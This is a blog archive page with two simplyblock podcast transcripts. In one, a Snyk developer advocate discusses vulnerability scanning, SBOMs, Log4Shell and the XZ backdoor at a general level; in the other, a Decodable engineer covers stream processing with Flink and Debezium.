SQL Archives | simplyblock

Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk

Chris Engelbert — Fri, 10 May 2024 12:12:16 +0000

This interview is part of the simplyblock’s Cloud Commute Podcast, available on Youtube , Spotify , iTunes/Apple Podcasts , Pandora , Samsung Podcasts, and our show site .

In this installment of podcast, we’re joined by Brian Vermeer ( Twitter/X , Personal Blog ) from Synk , a cybersecurity company providing tooling to detect common code issues and vulnerabilities throughout your development and deployment pipeline, talks about the necessity of multi checks, the commonly found threads, and how important it is to rebuild images for every deployment, even if the code hasn’t changed.

Chris Engelbert: Welcome back everyone. Welcome back to the next episode of simplyblock’s Cloud Commute podcast. Today I have yet another amazing guest with me, Brian from Snyk.

Brian Vermeer: That’s always the question, right? How do you pronounce that name? Is it Snek, Snik, Synk? It’s not Synk. It’s actually it’s Snyk. Some people say Snyk, but I don’t like that. And the founder wants that it’s Snyk. And it’s actually an abbreviation.

Chris Engelbert: All right, well, we’ll get into that in a second.

Brian Vermeer: So now you know, I mean.

Chris Engelbert: Yeah, we’ll get back to that in a second. All right. So you’re working for Snyk. But maybe we can talk a little bit about you first, like who you are, where you come from. I mean, we know each other for a couple of years, but…

Brian Vermeer: That’s always hard to talk about yourself, right? I’m Brian Vermeer. I live in the Netherlands, just an hour and a half south of Amsterdam. I work for Snyk as a developer advocate. I’ve been a long term Java developer, mostly back end developer for all sorts of jobs within the Netherlands. Java champion, very active in the community, specifically the Dutch community. So the Netherlands Java user group and adjacent Java user groups do some stuff in the virtual Java user group that we just relaunched. That I’ve tried to be active and I’m just a happy programmer.

Chris Engelbert: You’re just a happy programmer. Does that even exist?

Brian Vermeer: Apparently, I am the living example.

Chris Engelbert: All right, fair enough. So let’s get back to Snyk and the cool abbreviation. What is Snyk? What does it mean? What do you guys do?

Brian Vermeer: Well, what we do, first of all, we create security tooling for developers. So our mission is to make security an integrated thing within your development lifecycle. Like in most companies, it’s an afterthought. Like one security team trying to do a lot of things and we have something in the pipeline and that’s horrible because I don’t want to deal with that. If all tests are green, it’s fine. But what if we perceive it in such a way as, “Hey, catch it early from your local machine.” Just like you do with unit tests. Maybe that’s already a hard job creating unit tests, but hey, let’s say we’re all good at that. Why not perceive it in that way? If we can catch things early, we probably do not have to do a lot of rework if something comes up. So that’s why we create tooling for all stages of your software development lifecycle. And what I said, Snyk is an abbreviation. So now you know.

Chris Engelbert: So what does it mean? Or do you forget?

Brian Vermeer: So Now You Know.

Chris Engelbert: Oh!

Brian Vermeer: Literally. So now you know.

Chris Engelbert: Oh, that took a second.

Brian Vermeer: Yep. That takes a while for some people. Now, the thought behind that is we started as a software composite analysis tool and people just bring in libraries. They have no clue what they’re bringing in and what kind of implications come with that. So we can do tests on that. We can report of that. We can make reports of that. And you can make the decisions. So now at least you know what you’re getting into.

Chris Engelbert: Right. And I think with implications and stuff, you mean transitive dependencies. Yeah. Stuff like that.

Brian Vermeer: Yeah.

Chris Engelbert: Yeah. And I guess that just got worse with Docker and images and all that kind of stuff.

Brian Vermeer: I won’t say it gets worse. I think we shifted the problem. I mean, we used to do this on bare metal machines as well that these machines also had an operating system. Right. So I’m not saying it’s getting worse, but developers get into more responsibility because let’s say we’re doing DevOps, whatever that may mean. I mean, ask 10 DevOps engineers. That’s nowadays a job. What DevOps is, you probably get a lot of questions about tooling and that, but apparently what we did is tearing down the wall between old fashioned developer creation and getting things to production. So the ops folks, so we’re now responsible as a team to do all of that. And now your container or your environment, your cluster, your code is all together in your Git repository. So it’s all code now. And the team creating it is responsible for it. So yes, it shifted the problem from being in separate teams now to all in one team that we need to create and maintain stuff. So I don’t, I don’t think we’re getting into worse problems. I think we’re, we’re shifting the problems and it’s getting easier to get into problems. That’s, that’s what I, yeah.

Chris Engelbert: Yeah. Okay. We’re, we’re broadened the scope of where you could potentially run into issues. So, so the way it works is that Snyk, I need to remember to say Snyk and not Synk because now it makes sense.

Brian Vermeer: I’m okay with however you call it. As long as you don’t say sync, I’m fine. That’s, then you’re actually messing up letters.

Chris Engelbert: Yeah, sync, sync is different. It’s, it’s not, it’s not awkward and it’s not Worcester. Anyway. So, so that means the, the tooling is actually looking into, I think the dependencies, built environment, whatever ends up in your Docker container or your container image. Let’s say that way, nobody’s using Docker anymore. And all those other things. So basically everything along the pipeline or the built pipeline, right?

Brian Vermeer: Yeah. You can say that actually we start at the custom code that you’re actually writing. So we’re doing static analysis on that as well. Might combine that with stuff that we know from your, let’s say all your dependencies that come in your dependencies, transitive dependencies, like, “hey, you bring in a spring boot starter that has a ton of implications on how many libraries come in.” Are these affected? Yes or no, et cetera, et cetera. That we go one layer deeper or around that, say your, your container images and let’s say it’s Docker because it’s still the most commonly used, but whatever, like any image is built on a base image and probably you streamlined some binaries in there. So what’s there, that’s another shell around the whole application. And then you get into, in the end, for instance, your configuration for your infrastructure is go to the bullet. That can go wrong by not having a security context or like some policies that are not bad or something like that. Some pods that you gave more privileges than you should have because, Hey, it works on my machine, right? Let’s ship it. These kinds of things. So on all these four fronts, we try to provide pooling and test capabilities in such a way that you can choose how you want to utilize these test capabilities, either in a CI pipeline or our local machine or in between or part of your build, whatever fits your needs. And instead of, Hey, this needs to be part of your build pipeline, because that’s how the tool works. And I was a developer myself for back end for backend jobs a long time. And I was the person that was like, if we need to satisfy that tool, I will find a way around it.

Chris Engelbert: Yeah, I hear you.

Brian Vermeer: Which defeats the purpose because, because at that point you’re only like checking boxes. So I think if these tools fit your way of working and implement your way of working, then you actually have an enabler instead of a wall that you bump into every time.

Chris Engelbert: Yeah. That makes a lot of sense. So that means when you, say you start at a code level, I think simple, like the still most common thing, like SQL injection issues, all that kind of stuff, that is probably handled as well, right?

Brian Vermeer: Yeah. SQL injections, path of virtual injections, cross-site scripting, all these kinds of things will get notified and we will, if possible, we will give you remediation advice on that. And then we go levels deeper. So it’s actually like, you can almost say it’s like four different types of scanner that you can use in whatever way you want. Some people are like, no, I’m just only using the dependency analysis stuff. That’s also fine. Like it’s just four different capabilities for basically four levels in your, in your application, because it’s no longer just your binary that you put in. It’s more than that, as we just discussed.

Chris Engelbert: So, when we look at like the recent and not so recent past, I mean, we’re both coming from the Java world. You said you’re also, you were a Java programmer for a long time. I am. I think the, I mean, the Java world isn’t necessarily known for like the massive CVEs. except Log4Shell.

Brian Vermeer: Yeah, that was a big,

Chris Engelbert: Right? Yeah.

Brian Vermeer: The thing, I think, is in the Java world, it’s either not so big or very big. There’s no in between, or at least it doesn’t get the amount of attention, but yeah, Log4Shell was a big one because first of all, props to the folks that maintain that, because I think there were only three active maintainers at that point when the thing came out and it’s a small library that is used and consumed by a lot of bigger frameworks. So everybody was looking at you doing a bad job. It was just three guys that voluntarily maintained it.

Chris Engelbert: So for the people that do not know what Log4Shell was. So Log4J is one of the most common logging frameworks in Java. And there was a way to inject remote code and execute it with basically whatever permission your process had. And as you said, a lot of people love to run their containers with root privileges. So there is your problem right there. But yeah, so Log4Shell was, I think, at least from what I can remember, probably like the biggest CVE in the Java world, ever since I joined.

Brian Vermeer: Maybe that one, but we had in 2017, we had the Apache struts, one that blew, blew, blew away, blew away our friendly neighborhood Equifax. But yeah.

Chris Engelbert: I’m not talking about struts because that was like so long deprecated by that point of time. It was, it was, it was … They deserved it. No, but seriously, yeah. True, true. The struts one was also pretty big, but since we are just recording it, this on April 3rd, there was just like a very, very interesting thing that was like two days ago, three days ago, like April 1st. I think it was actually April 1st, because I initially thought it’s an April’s Fool joke, but it was unfortunately not.

Brian Vermeer: I think it was the last day of March though. So it was not.

Chris Engelbert: Maybe I just saw it like April 1st. To be honest, initially I thought, okay, that’s a really bad April’s Fool. So what we’re talking about is the XZ issue. Maybe you want to say a few words about that or what?

Brian Vermeer: Well, let’s keep it simple. The XZ issue is basically an issue in one of the tools that come with some Linux distributions. And long story short, I’m not sure if they already created exploits on that. I didn’t, I didn’t actually try it because we’ve got folks that are doing the research. But apparently there, because of that tool, you could do nasty stuff such as arbitrary code executions or, or things with going into secure connections. At least it comes with your operating system. So that means if you have a Docker image or whatever image and you’re based on a certain well-known Linux distribution, you might be infected, regardless of whatever your application does. And it’s a big one. If you want to go deeper, there are tons of blogs of people that can explain to you what the actual problem was. But I think for the general developers, like, don’t shut your eyes and like, it’s not on my machine. It might be in your container because you’re using an outdated, now outdated image.

Chris Engelbert: I think there’s two things. First of all, I think it was found before it actually made it into any distribution, which is good. So if you’re, if you’re not using any of the like self-built distributions, you’re probably good. But what I found more interesting about it, that this backdoor was introduced from a person that was working on the tool for quite a while, like over a year or so, basically getting the trust of the actual maintainers and just sneaking stuff in eventually. And that is… That is why I think tools like Snyk or let’s, let’s be blunt, some of the competitors are so important, right? Because it’s, it’s really hard to just follow all of the new CVEs and sometimes they’re not blowing up this big. So you probably don’t even hear about them, but for that reason, it’s really important to have those tools.

Brian Vermeer: I totally agree. I mean, as a development team, it is a side effect for you, like you’re building stuff and you don’t focus on checking manually, whatever is coming in and if it’s vulnerable or not, but you should be aware of these kinds of things. And so if they come in, you can make appropriate choices. I’m not saying you have to fix it. That’s up to you, like, and your threat level and whatever is going on in your company, but you need to be able to make these decisions based on accurate knowledge and have the appropriate knowledge that you can actually make such a decision. And yeah, you don’t want to manually hunt these things down. You want to be actively pinged when something happens to your application that might have implications for it, for your security risk.

Chris Engelbert: Right. And from your own feeling, like, in the past, we mostly deployed like on-prem installations or in like private clouds, but with the shift to public cloud, do we increase the risk factor? Do we increase the attack surface?

Brian Vermeer: Yes. I think the short story, the short thing is, yes, there are more things that we have under our control as a development team. We do not always have the necessary specialties within the team. So we’re doing the best we can, but that means we’ve got multiple attack phases. Like your connection with your application is one thing, but this one is if I can get into your container for some reason, I can use this, even though at some, some things in containers or some things in operating systems might not be directly usable, but part of a chain that causes a problem. So I can get in in one, like if there’s one hole, I could get in and use certain objects or certain binaries in my chain of attacks and make it a domino effect, basically. So you’re, you’re giving people more and more ammunition. So, and as we automate certain things, we do not always have the necessary knowledge about certain things that might become bigger and bigger. Plus the fast pace we’re currently moving. Like, like tell me like 10 years ago, how were you deploying?

Chris Engelbert: I don’t know. I don’t remember. I don’t remember yesterday.

Brian Vermeer: Yeah. But I mean, probably not three times a day, like 10 years ago, we’re probably deploying once a month, you have time to test or something like that. So it’s a combination of doing all within one team, which yes, we should do, but also the fast pace that we need to release nowadays is something like, okay, we’re just doing it. The whole continuous development and continuous deployment is part of this. If you’re actually doing that, of course.

Chris Engelbert: Yeah, that’s, that’s true. I think it would have been like about every two weeks or so. But yeah, you normally had like one week development, one week bug fixing and testing, and then you deployed it. Now it’s like, you do something, you think it’s ready, it runs through the pipeline. And in the best case, it gets deployed immediately. And if something breaks, you gonna fix it. Or are you in the worst case, you roll back if it’s really bad.

Brian Vermeer: But on the other end, say you’re an application developer, and you need to do that stuff in a container. And do you ship it? Are you touching your container if you or rebuild your container if your application didn’t change?

Chris Engelbert: Yes.

Brian Vermeer: Probably, probably, probably a lot of folks won’t, because hey, did some, some things didn’t change, but it can be that the image your base your stuff upon or your base image or however you may manage that can be company wide, or you just will something out of Docker hub or whatever. That’s another layer that might have changed and might have been fixed or might have been vulnerabilities found in it. So it’s not anymore like, ‘hey, I didn’t touch that application. So I don’t have to rebuild.’ Yes, you should because other layers in that whole application changed.

Chris Engelbert: Right, right. And I think you brought up an important other factor. It might be that meanwhile, like, during the last we were in between the last deployment, and now a CVE has been found or something else, right? So you want to make sure you’re going to test it again. And then you have other programming languages, I’m not naming things here. But you might get a different version of the dependency, which is slightly newer. You’re doing a new install, right? And, and all of that are there’s so many different things, applications, these days, even micro services are so complex, because they normally need like, so many different dependencies. And it is hard to keep an eye on that. And that kind of brings me to the next question, like, how does snake play into something like SBOM or the software bill of materials?

Brian Vermeer: Getting into the hype train of SBOMs. Now, it’s not, it’s not just the hype train. I mean, it’s a serious thing. For folks that don’t know, you can compare the SBOM as your ingredients nutrition list for whatever you try to consume to stuff in your face. Basically, what’s in there, you have no clue, the nutrition facts on the package should say what’s in it, right? So that’s how you should perceive an SBOM. If you create an artifact, then you should create a suitable SBOM with it that basically says, ‘okay, I’m using these dependencies and these transitive dependencies, and maybe even these Docker containers or whatever, I’m using these things to create my artifact.’ And a consumer of that artifact is then able to search around that like say a CVE comes up, a new Log4Shell comes up, let’s make it big. Am I infected? That’s the first question, a consumer or somebody that uses your artifact says. And with an SBOM, you have a standardized, well, there are three standards, but nevertheless, like multiple standard, but there’s a standardized way of having that and make it at least machine searchable to see if you are vulnerable or not. So how do we play into that? Yes, you can use our sneak tooling to create SBOMs for your applications or for your containers, that’s possible. We have the capabilities to read SBOMs in to see if these SBOMs contain packages or artifacts or stuff that have known vulnerabilities. So you can again, take the appropriate measures. I think it’s, yes, SBOM is great from the consumer side. So it’s very clear what that stuff that I got from the internet or got from a supplier, because we’re talking about supply chain all the time, from a supplier within stuff that I build upon or that I’m using that I can see if it contains problems or it contains potential problems when something new comes up. And yes, we have capabilities of creating these SBOMs and scanning these SBOMs.

Chris Engelbert: All right. We’re basically out of time. But there’s one more question I still want to ask. And how do you or where do you personally see the biggest trend could be related to Snyk to security in general?

Brian Vermeer: The biggest trend is the hype of AI nowadays. And that is definitely a thing. What people think is that AI is a suitable replacement for a security engineer. Yeah, I exaggerate now, but that’s not because we have demos where we let a code assistant tool, a well known code assistant tool, spit out vulnerable code, for instance. So I think the trend is two things, the whole supply chain, software supply chain, whatever you get into, you should look at one thing. But the other tool is that if people are using AI, don’t trust it blindly. And I think it’s that’s for everything for both stuff in your supply chain, as in generated code by a code assistant. You should know what you’re doing. Like it’s a great tool. But don’t trust it blindly, because it can also hallucinate and bring in stuff that you didn’t expect if you are not aware of what you’re doing.

Chris Engelbert: So yeah. I think that is a perfect closing. It can hallucinate things.

Brian Vermeer: Oh, definitely, definitely. It’s a lot of fun to play with it. It’s also a great tool. But you should know it doesn’t first of all, it doesn’t replace developers that think. Like thinking is still something an AI doesn’t do.

Chris Engelbert: All right. Thank you very much. Time is over. 20 minutes is always super, super short, but it’s supposed to be that way. So Brian, thank you very much for being here. I hope that was not only interesting to me. I actually learned quite a few new things about Snyk because I haven’t looked into it for a couple of years now. So yeah, thank you very much. And for the audience, I hope you’re listening next week. New guest, new show episode, and we’re going to see you again.

The post Automated Vulnerability Detection throughout your Pipeline with Brian Vermeer from Snyk appeared first on simplyblock.

Coding the Cloud: A Dive into Data Streaming with Gunnar Morling from Decodable (video + interview)

Chris Engelbert — Fri, 26 Apr 2024 12:13:28 +0000

This interview is part of the simplyblock’s Cloud Commute Podcast, available on Youtube , Spotify , iTunes/Apple Podcasts , Pandora , Samsung Podcasts, and our show site .

In this installment of podcast, we’re joined by Gunnar Morling (X/Twitter) , from Decodable , a cloud-native stream processing platform that makes it easier to build real-time applications and services, highlights the challenges and opportunities in stream processing, as well as the evolving trends in database and cloud technologies.

Chris Engelbert: Hello everyone. Welcome back to the next episode of simplyblock’s Cloud Commute podcast. Today I have a really good guest, and a really good friend with me. We know each other for quite a while. I don’t know, many, many, many years. Another fellow German. And I guess a lot of, at least when you’re in the Java world, you must have heard of him. You must have heard him. Gunnar, welcome. Happy to have you.

Gunnar Morling: Chris, hello, everybody. Thank you so much, family. Super excited. Yes, I don’t know, to be honest, for how long we have known each other. Yes, definitely quite a few years, you know, always running into each other in the Java community.

Chris Engelbert: Right. I think the German Java community is very encapsulated. There’s a good chance, you know, a good chunk of them.

Gunnar Morling: I mean, you would actively have to try and avoid each other, I guess, if you really don’t want to meet somebody.

Chris Engelbert: That is very, very true. So, well, we already heard who you are, but maybe you can give a little bit of a deeper introduction of yourself.

Gunnar Morling: Sure. So, I’m Gunnar. I work as a software engineer right now at a company called Decodable. We are a small startup in the data streaming space, essentially moving and processing your data. And I think we will talk more about what that means. So, that’s my current role. And I have, you know, a bit of a mixed role between engineering and then also doing outreach work, like doing blog posts, podcasts, maybe sometimes, going to conferences, talking about things. So, that’s what I’m currently doing. Before that, I’ve been for exactly up to the day, exactly for 10 years at Red Hat, where I worked on several projects. So, I started working on different projects from the Hibernate umbrella. Yes, it’s still a thing. I still like it. So, I was doing that for roughly five years working on Bean Validation. I was the spec lead for Bean Validation 2.0, for instance, which I think is also how we met or I believe we interacted somehow with in the context of Bean Validation. I remember something there. And then, well, I worked on a project which is called Debezium. It’s a tool and a platform for change data capture. And again, we will dive into that. But I guess that’s what people might know me for. I’m also a Java champion as you are, Chris. And I did this challenge. I need to mention it. I did this kind of viral challenge in the Java space. Some people might also have come across my name in that context.

Chris Engelbert: All right. Let’s get back to the challenge in a moment. Maybe say a couple of words about Decodable.

Gunnar Morling: Yes. So, essentially, we built a SaaS, a software as a service for stream processing. This means, essentially, it connects to all kinds of data systems, let’s say databases like Postgres or MySQL, streaming platforms like Kafka, Apache Pulsar. It takes data from those kinds of systems. And in the simplest case, it just takes this data and puts it into something like Snowflake, like a search index, maybe another database, maybe S3, maybe something like Apache Pino or Clickhouse. So, it’s about data movement in the simplest case, taking data from one place to another. And very importantly, all this happens in real time. So, it’s not batch driven, like, you know, running once per hour, once per day or whatever. But this happens in near real time. So, not in the hard, you know, computer science sense of the word, with a fixed SLA, but with a very low latency, like seconds, typically. But then, you know, going beyond data movement, there’s also what we would call data processing. So, it’s about filtering your data, transforming it, routing it, joining multiple of those real time data streams, doing things like groupings, real time analytics of this data, so you could gain insight into your data. So, this is what we do. It’s based on Apache Flink as a stream processing engine. It’s based on Debezium as a CDC tool. So, this gives you a source connectivity with all kinds of databases. And yeah, people use it for, as I mentioned, for taking data from one place to another, but then also for, I don’t know, doing fraud detection, gaining insight into their purchase orders or customers, you know, all those kinds of things, really.

Chris Engelbert: All right, cool. Let’s talk about your challenge real quick, because you already mentioned stream processing. Before we go on with, like, the other stuff, like, let’s talk about the challenge. What was that about?

Gunnar Morling: What was that about? Yes, this was, to be honest, it was kind of a random thing, which I started over the holidays between, you know, Christmas and New Year’s Eve. So, this had been on my mind for quite some time, doing something like processing one billion rows, because that’s what it was, a one billion row challenge. And this had been on my mind for a while. And I know somehow, then I had this idea, okay, let me just put it out into the community, and let’s make a challenge out of it and essentially ask people, so how fast can you be with Java to process one billion rows of a CSV file, essentially? And the task was, you know, to take temperature measurements, which were given in that file, and aggregate them per weather station. So, the measurements or the rows in this file were essentially always like, you know, a weather station name and then a temperature value. And you had to aggregate them per station, which means you had to get the minimum, the maximum and the mean value per station. So, this was the task. And then it kind of took off. So, like, you know, many people from the community entered this challenge and also like really big names like Aleksey Shipilëv, Cliff Click, Thomas Wuerthinger, the leads of GraalVm at Oracle and many, many others, they started to work on this and they kept working on it for the entire month of January. And like really bringing down those execution times, essentially, in the end, it was like less than two seconds for processing this file, which I had with 13 gigabytes of size on an eight core CPU configuration.

Chris Engelbert: I think the important thing is he said less than a second, which is already impressive because a lot of people think Java is slow and everything. Right. We know those terms and those claims.

Gunnar Morling: By the way, I should clarify. So, you know, I mean, this is highly parallelizable, right? So, the less than a second number, I think like 350 milliseconds or so this was an old 32 cores I had in this machine with hyperthreading, with turbo boost. So, this was the best I could get.

Chris Engelbert: But it also included reading those, like 13 gigs, right? And I think that is impressive.

Gunnar Morling: Yes. But again, then reading from memory. So, essentially, I wanted to make sure that disk IO is not part of the equation because it would be super hard to measure for me anyway. So, that’s why I said, okay, I will have everything in a RAM disk. And, you know, so everything comes or came out of memory for that context.

Chris Engelbert: Ok. Got it. But still, it got pretty viral. I’ve seen it from the start and I was kind of blown away by who joined that discussion. It was really cool to look after and to just follow up. I didn’t have time to jump into that myself, but by the numbers and the results I’ve seen, I would have not won anyway. That was me not wasting time.

Gunnar Morling: Absolutely. I mean, people pulled off like really crazy tricks to get there. And by the way, if you’re at JavaLand in a few weeks, I will do a talk about some of those things in Java land.

Chris Engelbert: I think by the time this comes out, it was a few weeks ago. But we’ll see.

Gunnar Morling: Ok. I made the mistake for every recording. I made the temporal reference.

Chris Engelbert: That’s totally fine. I think a lot of the JavaLand talks are now recorded these days and they will show up on YouTube. So when this comes out and the talks are already available, I’ll just put it in the show notes.

Gunnar Morling: Perfect.

Chris Engelbert: All right. So that was the challenge. Let’s get back to Decodable. You mentioned Apache Flink being like the underlying technology build on. So how does that work?

Gunnar Morling: So Apache Flink, essentially, that’s an open source project which concerns itself with real-time data processing. So it’s essentially an engine for processing either bounded or unbounded streams of events. So there’s also a way where you could use it in a batch mode. But this is not what we are too interested in so far. It’s always about unbounded data streams coming from a Kafka topic, so it takes those event streams, it defines semantics on those event streams. Like what’s an event time? What does it mean if an event arrives late or out of order? So you have the building blocks for all those kinds of things. Then you have a stack, a layer of APIs, which allow you to implement stream processing applications. So there’s more imperative APIs, which in particular is called the data streaming API. So there you really program in Java, typically, or Scala, I guess, your flow in an imperative way. Yeah Scala, I don’t know who does it, but that may be some people. And then there’s more and more abstract APIs. So there’s a table API, which essentially gives you like a relational programming paradigm. And finally, there’s Flink SQL, which also is what Decodable employs heavily in the product. So there you reason about your data streams in terms of SQL. So let’s say, you know, you want to take the data from an external system, you would express this as a create table statement, and then this table would be backed by a Kafka topic. And you can do a select then from such a table. And then of course you can do, you know, projections by massaging your select clause. You can do filterings by adding where clauses, you can join multiple streams by well using the join operator and you can do windowed aggregations. So I would feel that’s the most accessible way for doing stream processing, because there’s of course, a large number of people who can implement a SQL, right?

Chris Engelbert: Right. And I just wanted to say, and it’s all like a SQL dialect, it’s pretty close as far as I’ve seen to the original like standard SQL.

Gunnar Morling: Yes, exactly. And then there’s a few extensions, you know, because you need to have this notion of event time or what does it mean? How do you express how much lateness you would be willing to accept for an aggregation? So there’s a few extensions like that. But overall, it’s SQL. For my demos, oftentimes, I can start working on Postgres, developing, develop some queries on Postgres, and then I just take them, paste them into like the Flink SQL client, and they might just run as is, or they may need a little bit of adjustment, but it’s pretty much standard SQL.

Chris Engelbert: All right, cool. The other thing you mentioned was the Debezium. And I know you, I think you originally started Debezium. Is that true?

Gunnar Morling: It’s not true. No, I did not start it. It was somebody else at Red Hat, Randall Hauck, he’s now at Confluent. But I took over the project quite early on. So Randall started it. And I know I came in after a few months, I believe. And yeah, I think this is when it really took off, right? So, you know, I went to many conferences, I spoke about it. And of course, others as well. The team grew at Red Hat. So yeah, I was the lead for quite a few years.

Chris Engelbert: So for the people that don’t know, maybe just give a few words about what Debezium is, what it does, and why it is so cool.

Gunnar Morling: Right. Yes. Oh, man, where should I start? In a nutshell, it’s a tool for what’s called change data capture. So this means it taps into the transaction log of your database. And then whenever there’s an insert or an update or delete, it will capture this event, and it will propagate it to consumers. So essentially, you could think about it like the observer pattern for your database. So whenever there’s a data change, like a new customer record gets created, or purchase order gets updated, those kinds of things, you can, you know, react and extract this change event from the database, push it to consumers, either via Kafka or via pullbacks in an API way, or via, you know, Google Cloud PubSub, Kinesis, all those kinds of things. And then well, you can take those events and it enables a ton of use cases. So you know, in the simplest case, it’s just about replication. So taking data from your operational database to your cloud data warehouse, or to your search index, or maybe to cache. But then also people use change data capture for doing things like microservices, data exchange, because I mean, microservices, they, you want to have them self dependent, but still, they need to exchange data, right? So they don’t exist in isolation, and change data capture can help with that in particular, with what’s called the outbox pattern, just on the side note, people use it for splitting up monolithic systems into microservices, you can use this change event stream as an audit log. I mean, if you kind of think about it, it’s, you know, if you just keep those events, all the updates to purchase order, we put them into a database, it’s kind of like a search index, right? Maybe you want to enrich it with a bit of metadata. You can do streaming queries. So I know you maybe you want to spot specific patterns in your data as it changes, and then trigger some sort of alert. That’s the use case, and many, many more, but really, it’s a super versatile tool, I would say.

Chris Engelbert: Yeah, and I also have a couple of talks on that area. And I think my favorite example, that’s something that everyone understands is that you have some order coming in, and now you want to send out invoices. Invoices don’t need to be sent like, in the same operation, but you want to make sure that you only send out the invoice if the invoice was, or if the order was actually generated in the database. So that is where the outbox pattern comes in, or just looking at the order table in general, and filtering out all the new orders.

Gunnar Morling: Yes.

Chris Engelbert: So yeah, absolutely a great tool. Love it. It supports many, many databases. Any idea how many so far?

Gunnar Morling: It keeps growing. I know, certainly 10 or so or more. The interesting thing there is, well, you know, there is not a standardized way you could implement something like Debezium. So each of the databases have their own APIs, formats, their own ways for extracting those change events, which means there needs to be a dedicated Debezium connector for each database, which we want to support. And then the core team, you know, added support for MySQL, Postgres, SQL Server, Oracle, Cassandra, MongoDB, and so on. But then what happened is that also other companies and other organizations picked up the Debezium framework. So for instance, now something like Google Cloud Spanner, it’s also supported via Debezium, because the team at Google decided, that they want to expose change events based on the Debezium event format and infrastructure or ScyllaDB. So they maintain their own CDC connector, but it’s based on Debezium. And the nice thing about that is that it gives you as a user, one unified change event format, right? So you don’t have to care, which is the particular source database, does it come from Cloud Spanner, or does it come from Postgres? You can process those events in a unified way, which I think is just great to see that it establishes itself as a sort of a de facto standard, I would say.

Chris Engelbert: Yeah, I think that is important. That is a very, very good point. Debezium basically defined a JSON and I think Avro standard.

Gunnar Morling: Right. So I mean, you know, it defines the, let’s say, the semantic structure, like, you know, what are the fields, what are the types, how are they organized, and then how you serialize it as Avro, JSON, or protocol buffers. That’s essentially like a pluggable concern.

Chris Engelbert: Right. So we said earlier, Decodable is a cloud platform. So you basically have, in a little bit of a mean term, you have Apache Flink on steroids, ready to use, plus a couple of stuff on top of that. So maybe talk a little bit about that.

Gunnar Morling: Right. So yes, that’s the underlying tech, I would say. And then of course, if you want to put those things into production, there’s so many things you need to consider. Right. So how do you just go about developing and versioning those SQL statements? If you iterate on a statement, you want to have maybe like a preview and get a feeling or maybe just validation of this. So we have all this editing experience, preview. Then maybe you don’t want that all of your users in your organization can access all those streaming pipelines, which you have. Right. So you want to have something like role-based access control. You want to have managed connectors. You want to have automatic provisioning and sizing of your infrastructure. So you don’t want to think too much, “hey, do I need to keep like five machines for this dataflow sitting around?” And what happens if I don’t need them? Do I need to remove them and then scale them back up again? So all this auto scaling, auto provisioning, this is something which we do. Then we will primarily allow you to use SQL to define your queries, but then also we actually let you run your own custom Flink jobs. If that’s something which you want to do, you can do this. We are very close. And again, by the time this will be released, it should be live already. We will have Python, PyFlink support, and yeah, many, many more things. Right. So really it’s a managed experience for those dataflows.

Chris Engelbert: Right. That makes a lot of sense. So let me see. From a user’s perspective, I’m mostly working with SQL. I’m writing my jobs. I’m deploying those. Those jobs are everything from simple ETL to extract, translate, load. What’s the L again?

Gunnar Morling: Load.

Chris Engelbert: There you go. Nobody needs to load data. They just magically appear. But you can also do data enrichment. You said that earlier. You can do joins. Right. So is there anything I have to be aware of that is very complicated compared to just using a standard database?

Gunnar Morling: Yeah. I mean, I think this entire notion of event time, this definitely is something which can be challenging. So let’s say you want to do some sort of windowed analysis, like, you know, how many purchase orders do I have per category and hour, you know, this kind of thing. And now, depending on what’s the source of your data, those events might arrive out of order. Right. So it might be that your hour has closed. But then, like, five minutes later, because some event was stuck in some queue, you still get an event for that past hour. Right. And of course, now the question is, there’s this tradeoff between, okay, how accurate do you want your data to be? Essentially, how long do you want to wait for those late events versus, well, what is your latency? Right. Do you want to get out this updated count at the top of the hour? Or can you afford to wait for those five minutes? So there’s a bit of a tradeoff. I think, you know, this entire complex of event time, I think that’s certainly something where people often have at least some time to learn and grasp the concepts.

Chris Engelbert: Yeah, that’s a very good one. In a previous episode, we had the discussion about connected cars. And connected cars may or may not have an internet connection all the time. So you like super, super late events sometimes. All right. Because we’re almost running out of time.

Gunnar Morling: Wow. Ok.

Chris Engelbert: Yeah. 20 minutes is like nothing. What is the biggest trend you see right now in terms of database, in terms of cloud, in terms of whatever you like?

Gunnar Morling: Right. I mean, that’s a tough one. Well, I guess there can only be one answer, right? It has to be AI. I feel it’s like, I know it’s boring. But well, the trend is not boring. But saying it is kind of boring. But I mean, that’s what I would see. The way I could see this impact things like we do, I mean, it could help you just with like scaling, of course, like, you know, we could make intelligent predictions about what’s your workload like, maybe we can take a look at the data and we can sense, okay, you know, it might make sense to scale out some more compute load already, because we will know with a certain likelihood that it may be needed very shortly. I could see that then, of course, I mean, it could just help you with authoring those flows, right? I mean, with all those LLMs, it might be doable to give you some sort of guided experience there. So that’s a big trend for sure. Then I guess another one, I would see more technical, I feel like that’s a unification happening, right, of systems and categories of systems. So right now we have, you know, databases here, stream processing engines there. And I feel those things might come more closely together. And you would have real-time streaming capabilities also in something like Postgres itself. And I know maybe would expose Postgres as a Kafka broker, in a sense. So I could also see some more, you know, some closer integration of those different kinds of tools.

Chris Engelbert: That is interesting, because I also think that there is a general like movement to, I mean, in the past we had the idea of moving to different databases, because all of them were very specific. And now all of the big databases, Oracle, Postgres, well, even MySQL, they all start to integrate all of those like multi-model features. And Postgres, being at the forefront, having this like super extensibility. So yeah, that would be interesting.

Gunnar Morling: Right. I mean, it’s always going in cycles, I feel right. And even having this trend to decomposition, like it gives you all those good building blocks, which you then can put together and I know create a more cohesive integrated experience, right. And then I guess in five years, we want to tear it apart again, and like, let people integrate everything themselves.

Chris Engelbert: In 5 to 10 years, we have the next iteration of microservices. We called it SOAP, we called it whatever. Now we call it microservices. Who knows what we will call it in the future. All right. Thank you very much. That was a good chat. Like always, I love talking.

Gunnar Morling: Yeah, thank you so much for having me. This was great. Enjoy the conversation. And let’s talk soon.

Chris Engelbert: Absolutely. And for everyone else, come back next week. A new episode, a new guest. And thank you very much. See you.

The post Coding the Cloud: A Dive into Data Streaming with Gunnar Morling from Decodable (video + interview) appeared first on simplyblock.